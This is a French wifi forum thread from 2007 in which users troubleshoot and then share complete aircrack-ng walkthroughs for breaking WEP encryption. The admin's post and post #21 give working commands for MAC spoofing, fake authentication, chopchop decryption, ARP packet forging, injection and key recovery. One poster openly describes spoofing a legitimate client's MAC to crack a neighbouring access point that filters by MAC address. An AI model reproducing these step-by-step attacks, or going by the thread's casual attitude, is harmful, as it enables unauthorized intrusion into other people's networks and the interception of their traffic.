je n'arive pas a envoyer mes packet sur le reseau :s (Page 1) / Crack de clef wep / Forum d'entraide: tuto-fr.com

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 29-07-2007 00:55:27

Alucard
Membre
Inscription : 29-07-2007
Messages : 3

je n'arive pas a envoyer mes packet sur le reseau :s

bonjour a tous g découvert se site par google et je tien avent tout a remercier les fondateur de se site vous fait un boulot super smile

mais g voulu essayer le tuto que vous avez réaliser sur aircrack
g donc télécharger le live cd de "B.T. 2", ma clé wifi na pas u de problème pour se maitre en mode monitor mais lorsque j'ai voulu envoyer mes packet se crée mais la partie "(got 0 ARP requests)" ca reste a 0 :s

un peux comme sur cette image
aireplay-ng-attente-ARP.png

g évidament regarder si "l'IVs" augmentait mais il ne bouche pas sauf au moment ou je lance la production de packet il monte a 10 mais après il redèsant a 0 :s

je suis monte a 1.000.000 de packet mais ma partie "(got 0 ARP requests)" reste tjrs a 0 vous pouvez m'aider? dois-je acheter une carte comme celle que vous conseiller dans votre tuto ? l'interface de la mienne est "rausb0"


la mort n'est que l'amélioration d'une vie lassante

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 29-07-2007 01:16:12

kam
Membre
Inscription : 14-07-2007
Messages : 57

Re : je n'arive pas a envoyer mes packet sur le reseau :s

Salut, j'avais le mème problème que toi, j'avais mal compris le tuto, je suppose que quand tu dit que les ivs monte à dix et redescende à zéro s'est dans airodump que tu vois ça "la colonne à coté des data". Cette colonne t'indique le defilement des ivs par seconde "ça monte et ça descend" , en faite les ivs sont les data. Quant au arp dans aireplay ça depend, est-ce-que s'est "read 1000 000 packets" ou "sent 1 000 000 packets"?
Dans le premier cas je te conseille d'attendre d'avoir au moin 1 arp avant d'utilisé aircrack,
Dans le deuxième cas tu peut dès maintenant essayer de cracker la clé avec aircrack.
De toute mànière si tu veut savoir combien tu a d'ivs fait aircrack.
Ta carte? je ne pense pas que ça vienne de ta carte car tu a fait les premier etape "airmon" et "airodump".

Hors Ligne

#3 29-07-2007 03:07:47

Pierre.C
Membre
Inscription : 27-07-2007
Messages : 12

Re : je n'arive pas a envoyer mes packet sur le reseau :s

bonsoir,
moi aussi mes IV/s ne montent pas bien haut.... maximum 30, en gros ca fait 30-0-32-3-31-2 bref ca oscille toujours entre une valeur quasi nulle et une valeur de l'odre de 30 ... (c'est dommage quand on voit les videos et les tuto, ca monte dans les 300).

Afin de "provoquer" du traffic et donc de les faire monter plus vite, je tente une attaque chopcop --> chopchop atack failed...
Je tente une attaque -5 --> sending fragmented packet ... no answer repeating...et ainsi de suite.

Je sais vraiment plus quoi faire, j'arrive même pas a cracker mon propre wifi, pourtant j'ai un ordi "1" connecté dessus, et un autre "2" sur lequel je tente de cracker. Je peux a la rigueur télécharger avec l'ordi dit "1", j'ai remarqué que ca faisait un peu augmenter le traffic et donc l'IV/s sous airdump de l'autre ordi "2". Mais bon, c'est un peu "tricher" quand même...
C'est dommage, car tout marche bien avant, avec le 2 je vois bien l'adresse mac du 1 connecté sur mon réseau, j'ai certes parfois des problemes lors de l'attaque -1 mais sinon ca peut aller, c'est juste cette histoire de traffic a augmenter, j'ai l'impression que ca va prendre 10 j a collecter les 30 000 IVS necessaires... :-(

Hors Ligne

#4 29-07-2007 20:06:22

Alucard
Membre
Inscription : 29-07-2007
Messages : 3

Re : je n'arive pas a envoyer mes packet sur le reseau :s

merci pour ta réponse Kam pour la 1er partie oui tu a raison je comprend mieux mtn
et c "read 1000 000 packets" que g mais le problème c que y'a même pas 1ARP qui se mes :s
j'ai beau le laissez tournée ca change rien :s

et pour se qui est de airmon-ng oui c se que g fais la 1er fois il ma rien indiquer sur ma clé wifi donc après j'ai utiliser la commande "ifconfig rausb0 up" et après il ma bien indiquer le mode monitor
mais j'ai pas une très bonne clé wifi c pour quoi je pense que le mieux c que je commande une des clé qui est conseiller sur le site alors

en tout cas encore merci pour la précision de ta réponse Kam


la mort n'est que l'amélioration d'une vie lassante

Hors Ligne

#5 29-07-2007 22:11:44

Pierre.C
Membre
Inscription : 27-07-2007
Messages : 12

Re : je n'arive pas a envoyer mes packet sur le reseau :s

Ca y'est, j'ai pu enfin cracker mon propre réseau... (bon je me suis arreté a trouver la clef WEP).
Je n'ai pas eu a faire d'attaque en -4 et -5, juste du -3
J'avais 2 PC, le premier qui est sur le réseau en mode "téléchargement a fond", le second sous live CD BT. Alors c'est un peu galere, car parfois l'attaque -3 coupe le wifi du premier ordi, donc je dois l'arreter pour relancer la connexion, puis relancer l'attaque -3 (c'est tres tres chiant, et d'ailleurs je voudrai savoir si c'est normal ? je suis obligé de relancé manuellement la connexion, car sinon la carte ne peut pas se remettre d'elle même sur le réseau). En 1h, j'avais 40 000 packet, merci a aircrack-ptw !
Je comprends cependant  toujours pas pkoi aucune de mes attaque -4 et -5 ne fonctionnent pas.

Hors Ligne

#6 31-07-2007 04:38:31

Pierre.C
Membre
Inscription : 27-07-2007
Messages : 12

Re : je n'arive pas a envoyer mes packet sur le reseau :s

Re bonsoir

Personne peut m'expliquer pourquoi les attaques -4 et -5 ne fonctionnent jamais chez moi ? je suis a 2 cm de l'emmetteur du wifi (facon de parler mais bon, tout ca pour dire que je suis dans un cas idéal), et a chaque fois ca met no answer, repeating et ce indéfiniment. Enfin, lorsque des packet sont capturé, il y a 3 données avec des adresses mac (BSSID, dest MAC et source MAC). PArfois j'ai du FF:FF:FF:FF:FF:FF bref, je voulais savoir si ces données étaient importantes pour savoir s'il faut accepter le packet ou en attendre un autre..
Enfin, l'échec de ces attaques -4 et -5 sont elles dues a un mauvais spoofing ? par exemple lors de mon attaque -1, je n'ai pas de succes ?
Merci

Dernière modification par Pierre.C (31-07-2007 04:39:20)

Hors Ligne

#7 31-07-2007 14:43:37

Alucard
Membre
Inscription : 29-07-2007
Messages : 3

Re : je n'arive pas a envoyer mes packet sur le reseau :s

désoler je peux pas t'aider moi je suis toujours bloker avec mon problème j'ai commander ma clé wifi mais elle dois encore arriver donc je peux pas t'aider


la mort n'est que l'amélioration d'une vie lassante

Hors Ligne

#8 31-07-2007 16:25:41

jOk3r
Membre
Inscription : 31-07-2007
Messages : 5
Site Web

Re : je n'arive pas a envoyer mes packet sur le reseau :s

A tu essayer avec une autre carte ?


wifix.sup.fr    Forum  consacré au WIFI et à ses divers applications.

Hors Ligne

#9 31-07-2007 17:18:34

Pierre.C
Membre
Inscription : 27-07-2007
Messages : 12

Re : je n'arive pas a envoyer mes packet sur le reseau :s

Non je n'ai qu'une seule carte, il s'agit d'une netgear ath bref, le truc du tuto...
je me demandais, l'attaque -1 permet de spoofer une adresse mac d'un client conecté ? ou bien juste de voir si le réseau dispose d'une protection par adresse mac ?

Hors Ligne

#10 31-07-2007 19:06:22

wxcvbn
Membre d'honneur
Inscription : 28-02-2006
Messages : 1 139

Re : je n'arive pas a envoyer mes packet sur le reseau :s

Oui si tu rentre une adresse mac au hasard et que tu as le message AP reject mac.... c'est qu'il y a un filtrage d'adresse mac.

Hors Ligne

#11 01-08-2007 00:38:21

Pierre.C
Membre
Inscription : 27-07-2007
Messages : 12

Re : je n'arive pas a envoyer mes packet sur le reseau :s

je me demandais s'il était obligé d'obtenir une authentication successfull via l'attaque -1 si on voulait avoir une réussite dans la chopchop attack (ou défrag) ou bien si l'authentication successfull était facultative...

Dernière modification par Pierre.C (01-08-2007 00:38:43)

Hors Ligne

#12 02-08-2007 17:07:31

davaro
Membre
Inscription : 01-06-2007
Messages : 18

Re : je n'arive pas a envoyer mes packet sur le reseau :s

Je vais vous repondre en debutant , les experts me reprendront;)

J'ai bloqué un moment sur le tuto , il manque quelque chose je pense , il faudrait dire que s'il n'y auccun transfert de données entre AP et Station c'est rapé ...

En fait l'attaque -1 ne sert à rien , juste à savoir si l'AP est en mode filtrage MAC .

-1- Si l'AP est en mode filtrage MAC et qu'aucun client (station) n'est connectée , vous êtes dans les choux puisqu'il va falloir une adresse MAC pour vous associer à AP et injecter. On ne peut pas la deviner cette MAC !!
!!
-2- si l'AP est en mode accès toutes MAC ,mais aucunes données échangées,   l'association va se faire mais il va vous manquer quand même le premier ARP pour injecter. Encore dans les choux .

Conclusion l'attaque -1 ne sert à rien pour l'injection.

Pour injecter , il faut capturer quelques echanges de données entre une station et un AP et les réinjecter . attaque -3 -r  (fichier .cap)  ,pour l'instant ça marche chez moi à 100%.

Sachez que airodump crée un fichier txt avec toutes les stations qui se sont connectées pendant l'écoute et la capture. trés pratique .

Dernière modification par davaro (02-08-2007 18:06:43)

Hors Ligne

#13 02-08-2007 20:23:06

M1ck3y
Admin
Inscription : 08-04-2007
Messages : 434
Site Web

Re : je n'arive pas a envoyer mes packet sur le reseau :s

[email protected]:~#RECTIFICATION-NG davaro -1
starts reading davaro.cap
error reading davaro.cap, wrong datas!
starting rectification

Ce qu'il faut savoir en wep:
-AP sans filtrage mac: meme sans client on peut s'associer avec une mac bidon, après il n'y a plus qu'à faire une petite chopchop
aireplay-ng ath1 -1 30 -e "essid" -a "mac ap" -h "mac station"
le paramètre 30 est important, en l'absence d'un "vrai" client avec cette commande vous associez toutes les 30 secondes, et restez connecté à l'ap entre chaque assoc ("sending keep alive packets"), ainsi vous apparaitrez comme client dans votre airodump, et la chopchop (ou la fragmentation, qui est une attaque dans le meme genre) fonctionnera en fabriquant un arp sur la base de paquets que vous aurez vous meme échangé avec l'AP.
-AP avec filtrage mac: la meme chose, sauf qu'ici il vous faut connaitre la mac d'un client légitime pour la spoofer et réussir l'association. Savoir utiliser ethereal peut s'avérer précieux, quand vous ne voyez aucune station mais que les datas augmentent, ça ne veut pas forcément dire que quelqu'un est connecté en ethernet... J'ai déja retrouvé des mac de station asociée avec ethereal, alors qu'airodump ne les avait pas affichées...
Donc davaro, permet moi de te reprendre point par point, histoire de rétablir la vérité

"En fait l'attaque -1 ne sert à rien , juste à savoir si l'AP est en mode filtrage MAC ."
Faux, comme expliqué plus haut elle est la première étape d'une chopchop sans client (avec le paramètre 30 ou autre)

"-2- si l'AP est en mode accès toutes MAC ,mais aucunes données échangées,   l'association va se faire mais il va vous manquer quand même le premier ARP pour injecter. Encore dans les choux ."
Faux, le principe de la chopchop est justement de fabriquer une requete arp, avant de la réinjecter via aircrack-ng -3

"Conclusion l'attaque -1 ne sert à rien pour l'injection"
Faux, en l'absence de "vrai" client connecté, c'est exactement le contraire!

"Pour injecter , il faut capturer quelques echanges de données entre une station et un AP et les réinjecter . attaque -3 -r  (fichier .cap)  ,pour l'instant ça marche chez moi à 100%."
Vrai mais on peut également injecter des paquets que l'on a soi meme fabriqué, je l'ai testé plusieurs fois le résultat est surprenant.

"Sachez que airodump crée un fichier txt avec toutes les stations qui se sont connectées pendant l'écoute et la capture. trés pratique ."
Vrai, mais si vous voyez les datas augmenter, et aucun client connecté sous airodump, explorez votre fichier de capture avec ethereal et vous pourriez etre surpris...

Ces points étant rectifiés, un peu de culture:

-Fragmentation Technique
This section provides a brief explanation of the fragmentation technique used in easside-ng.

This technique, when successful, can obtain 1504 bytes of PRGA (pseudo random generation algorithm). This attack does not recover the WEP key itself, but merely obtains the PRGA. The PRGA can then be used to encrypt packets you want to transmit. It requires at least one data packet to be received from the access point in order to initiate the attack.

Basically, the program obtains a small amount of keying material from the packet then attempts to send packets with known content to the access point (AP). If the packet is successfully echoed back by the AP then a larger amount of keying information can be obtained from the returned packet. This cycle is repeated several times until 1504 bytes of PRGA are obtained.

-Linear Keystream Expansion Technique
This section provides a brief explanation of the linear keystream expansion technique used in easside-ng.

So you may also be asking “What is the linear keystream expansion technique?”. The foundation is the fact that packets like an encrypted ARP request can easily be identified combined with the fact that the start of it has known plain text.

The program first obtains the PRGA from known plain text portion of the ARP request. Then it creates a new ARP request packet broken into two fragments. The first fragment is one more byte then the know PRGA and the PRGA is guessed for the extra byte. These guesses are sent and the program listens to see which one is replayed by the AP. The replayed packet has the correct PRGA and this value was included in the destination multicast address. Now that we know the correct PRGA, one more byte can be decrypted in the original ARP request. This process is repeated until the sending IP in the original ARP request is decrypted. It takes a maximum of 256 guesses to determine the correct PRGA for a particular byte and on average only 128 guesses.

The linear keystream expansion technique (Arbaugh inductive) is reverse chopchop. Chopchop decrypts packets from back to the front. Linear decrypts packets from the front to the back. Actually, chopchop is reverse Arbaugh.

Et pour terminer la chopchop en toute simplicité:

FORGER SES REQUETES ARP: (commandes aircrack, à adapter par vos soins sous aircrack-ng, un minimum de recherche tout de meme...)

D'abord il faut decrypter un paquet
aireplay -4 ath0 -a "mac ap" -h "mac station"

Ensuite trouver l'ip (qui est probablement 192.168.1.1 ou 192.168.1.2)
tcpdump -s 0 -n -e -r nomdupaquetdécrypté.cap

Maintenant il faut forger une requete arp
arpforge nomdupaquetdécrypté.xor 1 "mac ap" \ "mac station" 192.168.1.100 192.168.1.1 arp.cap

Maintenant on peut envoyer cette requette pour faire grimper les ivs!
aireplay -3 -e "essid" -a "mac ap" -b "mac ap" -h "mac station" -x600 -r arp.cap ath0

En l'absence de client cette methode fonctionne aussi si on se fait passer pour un client sur un autre shell, on decrypte alors les paquets qu'on a soi meme envoyé mais ça marche!
aireplay ath0 -1 30 -e "essid" -a "mac ap" -h "mac station"

Voila comment faire grimper les ivs, meme sans arp et sans client c'est possible, il suffit d'avoir l'adresse mac d'une station associée à l'ap.

TEXTE ORIGINAL:

KoreK's "chopchop" (CRC prediction)

This attack, when successful, can decrypt a WEP data packet without knowing the key. It can even work against dynamic WEP. This attack does not recover the WEP key itself, but merely reveals the plaintext. However, most access points are not vulnerable at all. Some may seem vulnerable at first but actually drop data packets shorter that 60 bytes. This attack requires at least one WEP data packet.
First, we decrypt one packet :
aireplay -4 -h 00:09:5B:EB:C5:2B ath0
Let's have a look at the IP address :
tcpdump -s 0 -n -e -r replay_dec-0627-022301.cap
reading from file replay_dec-0627-022301.cap, link-type [...]
IP 192.168.1.2 > 192.168.1.255: icmp 64: echo request seq 1
Then, forge an ARP request.
The source IP (192.168.1.100) doesn't matter, but the destination IP (192.168.1.2) must respond to ARP requests. The source MAC must belong to an associated station.
./arpforge replay_dec-0627-022301.xor 1 00:13:10:30:24:9C \
00:09:5B:EB:C5:2B 192.168.1.100 192.168.1.2 arp.cap
And replay our forged ARP request :
aireplay -2 -r arp.cap ath0

En esperant vous avoir appris des choses, ce n'était pas pour te contredire davaro, mais j'étais en mode rectification-ng wink

RECTIFICATION-NG successfull
[email protected]:~#


logo602.jpg logo-wifi-highpower-175x60.jpg logo-awus036h-petit.png

Hors Ligne

#14 02-08-2007 21:32:19

davaro
Membre
Inscription : 01-06-2007
Messages : 18

Re : je n'arive pas a envoyer mes packet sur le reseau :s

-wifiway:~#airmon_ng start M1ck3y Mode Monitor


-wifiway:~#read all message


Conclusion 0.2 :

Si vous avez 10 BSSD à filtrage MAC connectés au repos sans transfert de données . Pas de client , pas de station , pas de MAC , -h "mac station" impossible  .  On ne peut pas faire grand chose sinon mettre une petite pub de divx de cuul à télécharger gratuitement dans la boite aux lettres des clients wink

si vous avez 1 BSSD  sans filtrage , vous gardez votre MAC perso ou mettez n'importe quoi dans -h "mac station" puisque airplay la change automatiquement . ( commencer quand même par 00: )
aireplay-ng ath1 -1 30 -e "essid" -a "mac ap" -h "mac station" ...  etc  ..


FORGER SES REQUETES ARP: D'abord il faut decrypter un paquet  ,   big_smile  ,  oui mais pour decrypter un paquet , il faut bien en recevoir big_smile  , C'est la poule qui fait l'oeuf ou l'oeuf qui fait la poule ?  roll


..

Hors Ligne

#15 02-08-2007 23:50:20

M1ck3y
Admin
Inscription : 08-04-2007
Messages : 434
Site Web

Re : je n'arive pas a envoyer mes packet sur le reseau :s

Oui c'est là toute la subtilité de l'attaque chopchop, d'un coté tu t'associes régulièrement via aircrack-ng -1 30, te faisant ainsi passer pour un client et de l'autre tu décryptes les paquets qui sont échangés entre l'AP et... TOI! big_smile
C'est puissant quand tu maitrises le truc!


logo602.jpg logo-wifi-highpower-175x60.jpg logo-awus036h-petit.png

Hors Ligne

#16 03-08-2007 00:01:50

kam
Membre
Inscription : 14-07-2007
Messages : 57

Re : je n'arive pas a envoyer mes packet sur le reseau :s

Salut, je doute d'une chose que je viens de voir sur vos post, quand vous parler de l'attaque -1 30 ont met bien le bssid et la station de la cible? et non pas le bssid de la cible et sa propre station?
Merci de m'éclairer car j'ai toujour fait la première solution sans aucun succès.

Hors Ligne

#17 03-08-2007 01:06:24

davaro
Membre
Inscription : 01-06-2007
Messages : 18

Re : je n'arive pas a envoyer mes packet sur le reseau :s

si l'AP ne fait pas de filtrage , tu mets ce que tu veux , puisque l'AP associe tout ce qui lui arrive ;

Si l'AP fait du filtrage , tu es obligé de mettre une MAC de station RECONNUE . ( capture minimum oblige )

Je n'ai jamais reussi aucune injection si calme mort sur la cible . ça c'est du mythe ou alors je n'ai pas été patient , j'ai attendu 10 mn  c'est tout puis ctrl+C smile

Hors Ligne

#18 03-08-2007 02:01:57

massanu
Membre
Inscription : 15-12-2006
Messages : 36

Re : je n'arive pas a envoyer mes packet sur le reseau :s

Oui il faut faire preuve de patience.

Exemple perso :

Une AP que je capte tres bien mais jamais je n'ai vu de station connecté et elle applique le filtrage, alors chaque jour je laissais tourné airodump en esperant voir une station, jusqu'au jour ou par chance une station c'est connecté furtivement, juste le temps de noté son adresse MAC

Et la nickel chrome j'ai pu cracker l'AP en moins de 10min avec injection d'ARP et aircrack-ptw smile

Comme quoi, la patience paye smile

Hors Ligne

#19 03-08-2007 21:30:37

M1ck3y
Admin
Inscription : 08-04-2007
Messages : 434
Site Web

Re : je n'arive pas a envoyer mes packet sur le reseau :s

[email protected]:~#what_the_fuck-ng davaro -2
error reading davaro.cap, wrong datas! What_the fuck???
davaro, l'attaque chopchop n'est pas un mythe, j'ai cracké plus d'une ap sans client connecté avec ça, et à l'époque j'étais sous whax... D'ailleurs c'est suite à une de mes premières interventions sur ce forum qu'un tuto chopchop a été créé. Je me suis assez creusé la tete pour faire fonctionner ça, je ne te laisserais pas dire que c'est un mythe.
C'est juste que tu ne maitrises pas encore cette attaque.
A mon avis ça ne saurait tarder... wink

what_the_fuck-ng don't ever say chopchop is a myth!!! Or it's just u can't do it by urself...
[email protected]:~


logo602.jpg logo-wifi-highpower-175x60.jpg logo-awus036h-petit.png

Hors Ligne

#20 04-08-2007 01:26:14

kam
Membre
Inscription : 14-07-2007
Messages : 57

Re : je n'arive pas a envoyer mes packet sur le reseau :s

Salut, il y a aussi une chose que je ne comprend pas, vous écriver que en faisant -1 30 l'attaque se fera toute les trente seconde alors que moi qu'en je le fait ça ne change rien, entre -1 0 et -1 30 ça met autant de temps du début à la fin de l'attaque, s'est à dire à peut près 10 secondes et evidemment pas de succesful.
Est-ce normal?
Merci d'avance.

Hors Ligne

#21 04-08-2007 01:55:40

davaro
Membre
Inscription : 01-06-2007
Messages : 18

Re : je n'arive pas a envoyer mes packet sur le reseau :s

Bon ca y est ce n'est pas un mythe , j'ai reussi  sur un BSSID au calme plat . smile

Donc voici la methode si vous avez une BSSID sans filtrage mac et surtout  sans activité :



airmon-ng start wifi0  ( carte en mode monitor)
ifconfig votreinterface up  ( demarre l'interface)

trouver une cible avec airodump-ng -c CHANNEL -w fichierdecapture interfacewifi

dans une autre console faire la bise à la cible ;

aireplay-ng -1 30 -e ESSID -a BSSID -h STATION votreinterface

---> association succesfull toutes les 30 s ( à savoir qu'il faut une pWR de 15 minimum sinon ça accroche pas et c'est le bordel )

Nous utilisons maintenant la méthode "chopchop" d'aireplay pour la création d'un ARP qu'on a pas .
La syntaxe n'a rien de compliqué, il suffit juste de faire dans une autre console  :
aireplay-ng -4 -b BSSIDAP -h MACSTATION interfacewifi
( à savoir que j'ai du enlever -h MACSTATION pour que ça marche pour moi  donc aireplay-ng -4 -b BSSIDAP interfacewifi )

--> attendre quelques minutes construction d'un fichier .cap et .xor apres 2% done , 4% done , 6% done ....etc...100 %done

nous allons les appeler chop.cap et chop.xor pour cet exemple mais bien penser qu'il faudra les noter car c'est aireplay qui les nomme .

Avant d'utiliser packetforge, il faut connaitre l'adressage du réseau en question, nous allons utiliser tcpdump.
La syntaxe est la suivante :

tcpdump -s 0 -n -e -r chop.cap

Le fichier .cap que vous devez mettre est celui crée au préalable par l'attaque chopchop d'aireplay-ng.
Une fois la syntaxe éxécuté, les informations sortes. Nous voyons l'adresse en question :

192.168.0.3 ip sources (station)


Nous ne voyons pas l'ip de la destination mais nous la devinons:

192.168.0.1 ip destination (Routeur) ( chercher sur internet des infos sur les IP des box et routeur wifi mais en général c'est 192.168.0.1 )



packetforge-ng -0 -a BSSIDAP -h BSSIDSTATION -k IPSOURCE -l IPDESTINATION -y chop.xor -w injection

-0 => Nous indiquons à packetforge que nous voulons un paquet du type "arp"
-w => sert à crée le fichier ARP en question, vous pouvez bien sûr changer le nom (à la place d'injection)


L'arp est maintenant crée il nous suffit plus que de l'injecter classiquement

aireplay-ng -3 -e ESSID -a BSSIDAP -b BSSIDAP -h MACSTATION -r injection interfacewifi ( possibilité de mettre le nombre de paquets par secondes -x 100 à 1000 , 600 par defaut )


si ce n'est deja fait lancer airodump-ng -c CHANNEL -w fichierdecapture interfacewifi

-w => sert à crée le fichier de capture qu'on donnera à aircrack, vous pouvez bien sûr changer le nom (à la place de fichierdecapture)

on voit dans la console airodump que l'injection est bénéfique puisque les dataIVS augmentent considerablement ( compter 30 mn pour en avoir 50000 quand même )

passer le fichier de capture dans aircrack-ng 0.9 ( le dernier qui utilise l'attaque PTW  )
aircrack-ng -x -z fichierdecapture.cap

key found en 10 secondes .;)


voila

Dernière modification par davaro (04-08-2007 02:49:22)

Hors Ligne

#22 04-08-2007 02:10:04

kam
Membre
Inscription : 14-07-2007
Messages : 57

Re : je n'arive pas a envoyer mes packet sur le reseau :s

Salut, est-ce-que ça marche à tous les coup pour toi?

Hors Ligne

#23 04-08-2007 02:48:20

davaro
Membre
Inscription : 01-06-2007
Messages : 18

Re : je n'arive pas a envoyer mes packet sur le reseau :s

ben c'est la premiere fois , je ne peux pas te dire a tous les coups mais ça semble tres tres positif

Hors Ligne

#24 04-08-2007 11:07:44

jOk3r
Membre
Inscription : 31-07-2007
Messages : 5
Site Web

Re : je n'arive pas a envoyer mes packet sur le reseau :s

J ai rédiger un tuto sur l'attaque chopchop.


wifix.sup.fr    Forum  consacré au WIFI et à ses divers applications.

Hors Ligne

#25 04-08-2007 11:09:30

jOk3r
Membre
Inscription : 31-07-2007
Messages : 5
Site Web

Re : je n'arive pas a envoyer mes packet sur le reseau :s

J ai rédiger un tuto sur l'attaque chopchop.


wifix.sup.fr    Forum  consacré au WIFI et à ses divers applications.

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

Sujets similaires